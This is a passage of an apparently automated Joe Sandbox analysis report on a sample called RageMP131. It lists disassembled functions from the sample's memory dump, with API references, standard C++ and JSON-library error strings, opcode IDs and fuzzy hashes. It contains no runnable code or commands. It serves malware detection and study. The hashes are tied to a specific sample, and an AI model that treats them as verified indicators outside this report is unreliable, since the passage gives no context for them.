                                  • Instruction ID: 9ae3b6f9146255615c20dee7ba9a1efb1b854a0f3ab4754a4d1f45dd5981581a
                                  • Opcode Fuzzy Hash: 84f1e675be7825df6cb832cb9344f00ddac710c93601f56f498d933aaf88a832
                                  • Instruction Fuzzy Hash: 2EE180709142488FDB19CF68C884B9DBBB5FF49300F2482ADE419EB792D7749A91CF91
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C75BE
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C75CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: at line $, column $`!,
                                  • API String ID: 4194217158-4202377963
                                  • Opcode ID: 54f827428ecc31fbc9ac2588ab0c0b484577ff9cdef6129825e47c1ca1ebe826
                                  • Instruction ID: 95bcbe514ab9d85a1368d2a35ad8f3de8fcc9166a9e0756f5520c00476279486
                                  • Opcode Fuzzy Hash: 54f827428ecc31fbc9ac2588ab0c0b484577ff9cdef6129825e47c1ca1ebe826
                                  • Instruction Fuzzy Hash: 5361F270A102049FDB1DCF68DC84BADBBB6FF45300F24862CE415ABB81D774AA548B90
                                  APIs
                                    • Part of subcall function 002C3190: ___std_exception_copy.LIBVCRUNTIME ref: 002C32C6
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C345F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: +4,$@3,$@3,$`!,
                                  • API String ID: 2659868963-1443510104
                                  • Opcode ID: f645f1abb756e67c29598abb2d5918c7e000217a19d2455a6f758c8b8ec95f92
                                  • Instruction ID: 68f15a29851d4798c8bfa9e54581a23a0309fe96e9779fefc060270f61809815
                                  • Opcode Fuzzy Hash: f645f1abb756e67c29598abb2d5918c7e000217a19d2455a6f758c8b8ec95f92
                                  • Instruction Fuzzy Hash: 0E3183759002099FCB19DFA8D841EEEFBF9FB09310F14862EE515D7641E770AA50CB90
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C345F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: +4,$@3,$@3,$`!,
                                  • API String ID: 2659868963-1443510104
                                  • Opcode ID: e69a750ecc1df1fe38bfa402db9b7ea98f17a4bd210f7054a6817afad410cf05
                                  • Instruction ID: 98ca65bc141818e9e8be821c03711afb18b3f91a49789e512eb075c25b964425
                                  • Opcode Fuzzy Hash: e69a750ecc1df1fe38bfa402db9b7ea98f17a4bd210f7054a6817afad410cf05
                                  • Instruction Fuzzy Hash: 4F01FFB6500609AF8709DFA9D445D96FBFDEF45310700856AE619C7611E7B0E524CB90
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C6F11
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C6F20
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: [json.exception.$`!,
                                  • API String ID: 4194217158-4272543052
                                  • Opcode ID: c1fb0ad429819c5ac32b0e41c5d19eb47e0ab83c783205f27c956d237bfa8e68
                                  • Instruction ID: 9b4939c686bf724d6650fca8faa27e0feda52fcc9ddecf4e3340a0870fbf2473
                                  • Opcode Fuzzy Hash: c1fb0ad429819c5ac32b0e41c5d19eb47e0ab83c783205f27c956d237bfa8e68
                                  • Instruction Fuzzy Hash: DB91C170A102089FDB19CF68D888F9EBBF6EF45300F20866DE415EB792D771AA41CB51
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002C2275
                                    • Part of subcall function 0039D6E9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0039D6F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                  • String ID: string too long$L?$L?
                                  • API String ID: 1997705970-123487069
                                  • Opcode ID: f4c5f38f9d7aad4239cc08b5c8beb98812d1db4da204b6c8ef3914b0f73c37bd
                                  • Instruction ID: dd925a892a296c18c71e297c9e71156b01bd94b2ad6d4369200f4fd4078f83bc
                                  • Opcode Fuzzy Hash: f4c5f38f9d7aad4239cc08b5c8beb98812d1db4da204b6c8ef3914b0f73c37bd
                                  • Instruction Fuzzy Hash: 72815875A14286DFCB16CF68C450BEEBFB5EF5A300F1842AEC85497742CB744559CBA0
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C77B4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,$invalid_iterator
                                  • API String ID: 2659868963-2975477599
                                  • Opcode ID: f9af32ae31d2764dde020eaa00b297af1a64b1b99441c18947169715aac168fc
                                  • Instruction ID: 7ae622d35bd49e252d91b1580ade8475b775a18f1358f4fd674cc29e4d7ff7c1
                                  • Opcode Fuzzy Hash: f9af32ae31d2764dde020eaa00b297af1a64b1b99441c18947169715aac168fc
                                  • Instruction Fuzzy Hash: 945126B49002488FDB19CFA8D984B9DFBF5BB49300F14866DE419EB791E774A984CF90
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C7D67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,$other_error
                                  • API String ID: 2659868963-91030564
                                  • Opcode ID: 077acc363295ce71f6880b237dd8b78ac49714c166a982cdc643bcf0d492710f
                                  • Instruction ID: 785aa8b9ee2df5d97bb8491778ea8565d8532ccb9fd89f2783a7e48f45b68474
                                  • Opcode Fuzzy Hash: 077acc363295ce71f6880b237dd8b78ac49714c166a982cdc643bcf0d492710f
                                  • Instruction Fuzzy Hash: FB5159B09102488FDB19CFA8D984BADBBF5BF49300F14826DE41AEB781D774A980CF50
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0032D06F
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0032D096
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,
                                  • API String ID: 2659868963-131796292
                                  • Opcode ID: fda45eaca5a2a3375049ca3a9f1f0e42212fab633ab1c617919edb592068f32d
                                  • Instruction ID: cd66280b534122bc97cfea25501ddb8ce24887227b71baafc4e819a4882c7814
                                  • Opcode Fuzzy Hash: fda45eaca5a2a3375049ca3a9f1f0e42212fab633ab1c617919edb592068f32d
                                  • Instruction Fuzzy Hash: 3801A8B6500605AFC709DF59D505882FBF8FB45710701852FA52ACBB10D7B0F528CFA0
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0033B3DF
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0033B406
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,
                                  • API String ID: 2659868963-131796292
                                  • Opcode ID: 33224eedb60b00052ef9821f182cdade65a20e2118268496b1892af6ab0dfaae
                                  • Instruction ID: 7ffc48444c00a5f2e5916a8a396a0ec09ac2cac1ba2a6e4d85042cf0187bbedf
                                  • Opcode Fuzzy Hash: 33224eedb60b00052ef9821f182cdade65a20e2118268496b1892af6ab0dfaae
                                  • Instruction Fuzzy Hash: 51F0C9BA500605AF870ADF55D505886FBE9FA45710701852FE52ACB710E7B0E524CFA0
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 0033B612
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: Px3$invalid hash bucket count
                                  • API String ID: 909987262-3929844800
                                  • Opcode ID: 2c31a51e89d1f531b10096a841aae069538f5ced431e223398b4d968c871e341
                                  • Instruction ID: baa2fb8dfb592d1c246ee4ada5ba0da3aca42410c3c89a65fff46d1c7481fffa
                                  • Opcode Fuzzy Hash: 2c31a51e89d1f531b10096a841aae069538f5ced431e223398b4d968c871e341
                                  • Instruction Fuzzy Hash: 007110B5A00609DFCB15CF49C18086AFBF5FF89300B24C5AAE9599B356D731EA41CF90
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0033E491
                                  Strings
                                  • type must be boolean, but is , xrefs: 0033E582
                                  • type must be string, but is , xrefs: 0033E4F8
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: type must be boolean, but is $type must be string, but is
                                  • API String ID: 118556049-436076039
                                  • Opcode ID: bfa142b9c803a961c630923ba647d987ddd347ad785699a15434d44261b3eab8
                                  • Instruction ID: 63bb39df0c3336eab0832f6b413576b0e73107a3a0c755c4eac858a0ff2882fb
                                  • Opcode Fuzzy Hash: bfa142b9c803a961c630923ba647d987ddd347ad785699a15434d44261b3eab8
                                  • Instruction Fuzzy Hash: 3B4189B5900248AFCB16EBA4E842F9EB7A8DF04300F144678F419DB6C2EB35ED40C792
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C3078
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,
                                  • API String ID: 2659868963-131796292
                                  • Opcode ID: cdbe7dc67c6cbed460adb684ff0e0d72b18ec48e5f3dce6c7405cfac71d5c719
                                  • Instruction ID: d4901aacff365470a7f5fdc28c78e6377a10569d98a2c594d6814354f05a432c
                                  • Opcode Fuzzy Hash: cdbe7dc67c6cbed460adb684ff0e0d72b18ec48e5f3dce6c7405cfac71d5c719
                                  • Instruction Fuzzy Hash: 67E0EDB69012089FC711DFA8990598AFBE8AB19701F0086AAE948DB300F6B0A9548BD1